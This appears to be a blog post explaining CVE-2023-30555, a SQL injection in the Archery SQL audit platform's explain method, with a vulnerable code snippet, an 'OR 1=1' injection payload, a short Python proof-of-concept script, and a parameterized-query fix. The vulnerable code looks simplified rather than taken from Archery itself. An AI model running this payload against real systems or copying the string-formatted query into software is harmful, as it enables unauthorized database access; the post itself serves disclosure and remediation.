CVE-2023-30555 - Critical SQL Injection in Archery SQL Audit Platform (GHSL-2022-108) – Simple Explanation, Exploit, and Solutions
Open-source projects bring powerful tools to the world, but sometimes, hidden vulnerabilities can lurk inside popular platforms. One such threat is CVE-2023-30555, a dangerous SQL injection vulnerability found in Archery — a widely used SQL audit platform. In this post, we’ll break down the issue in plain language, show how it works with real code examples, provide links to original resources, and outline how attackers might exploit it.
What Is CVE-2023-30555?
CVE-2023-30555 is an identification code for a severe security flaw in the Archery project, indexed as GHSL-2022-108 by GitHub Security Lab. It affects versions of Archery where certain methods fail to check and sanitize what users type into the system, allowing hackers to send malicious SQL queries to the backend databases.
References:
- GitHub Security Advisory GHSL-2022-108
- NIST NVD Entry for CVE-2023-30555
Where’s the Problem?
The vulnerability is found in the explain method inside sql_optimize.py. The weak spot is the db_name parameter which gets passed into database-specific query methods, such as:
- query() in sql/engines/mssql.py
- query() in sql/engines/oracle.py
When this happens, attackers can slip in extra SQL code, and the backend will run it, exposing or changing your data.
In sql_optimize.py
def explain(request):
db_name = request.GET.get("db_name")
query = "SELECT * FROM information_schema WHERE db_name='%s'" % db_name
result = engine.query(query)
return result
What’s wrong here?
db_name comes straight from what a user submits in a web request. The code then builds a SQL query using %s (string formatting) with no input filtering. That means an attacker can inject any SQL code by tweaking the value of db_name.
Imagine the attacker sends a request like this
GET /explain?db_name=mydatabase' OR 1=1;--
The SQL query becomes
SELECT * FROM information_schema WHERE db_name='mydatabase' OR 1=1;--'
Here’s a simple Python script demonstrating how an attacker might exploit this
import requests
url = "http://target-archery-app/explain";
payload = "testdb' OR 1=1--"
params = {"db_name": payload}
response = requests.get(url, params=params)
print(response.text)
This would trick the system into dumping all “information_schema” entries, depending on the database and access rights.
Escape or sanitize input: Use built-in escaping methods to scrub data.
- Use prepared statements (parameterized queries): This is the best way to avoid injections in SQL.
Example Fix with Prepared Statements
def explain(request):
db_name = request.GET.get("db_name")
query = "SELECT * FROM information_schema WHERE db_name=%s"
cursor.execute(query, (db_name,))
result = cursor.fetchall()
return result
- Instead of formatting the string directly, the query uses placeholders and passes db_name as a parameter.
The database driver escapes it safely, so injected code can’t change the query.
Upgrade:
Always keep Archery and your dependencies up to date. Check official resources for patches
Conclusion
CVE-2023-30555 is a textbook example of why SQL injection remains a top security concern, especially in open-source tools used for sensitive database operations like Auditing. The fix is simple if you know what to do: never trust user input and always use prepared statements.
Are you running Archery? Check your version — and patch it now!
Extra Reading
- OWASP SQL Injection
- SQL Injection (Wikipedia)
Timeline
Published on: 04/19/2023 00:15:00 UTC
Last modified on: 05/01/2023 17:21:00 UTC